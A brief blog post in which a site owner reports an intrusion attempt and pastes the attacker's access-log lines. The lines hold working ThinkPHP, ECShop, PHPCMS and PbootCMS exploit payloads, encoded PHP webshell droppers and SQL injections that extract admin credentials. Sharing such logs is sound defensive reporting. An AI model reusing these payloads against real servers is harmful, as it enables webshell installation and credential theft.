124.156.120.3 – Another Hacking Attempt

Found another hacking attempt this morning when examining the access.log. I’ve pasted the requests from 124.156.120.3 below. It appears attempt to inject some PHP and SQL code. In addition 124.156.120.3 also identify itself as Bingbot, which obviously is not true.

124.156.120.3 seems to be assigned to Singapore Tencent Cloud Computing (beijing) Co. Ltd. It’s likely one of their customers that have been hacked. Here’s the location on a Google map:

124.156.120.3 - - [17/Sep/2019:14:08:53 -0700] "PUT //QqYN1A763TmozH0L.txt HTTP/1.1" 404 4221 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[KxVHuP17U239lQyI]);{//../rss HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:56 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7350 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=53USa9rmzg916cmW.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:58 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:59 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27f*ck%27]);&f*ck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "POST //index.php?s=index HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //d.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //user.php?act=login HTTP/1.1" 404 413 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:03 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:06 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //index.php?_m=mod_email&_a=do_mail HTTP/1.1" 404 396 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //news/html/?410'union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where'1'='1.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

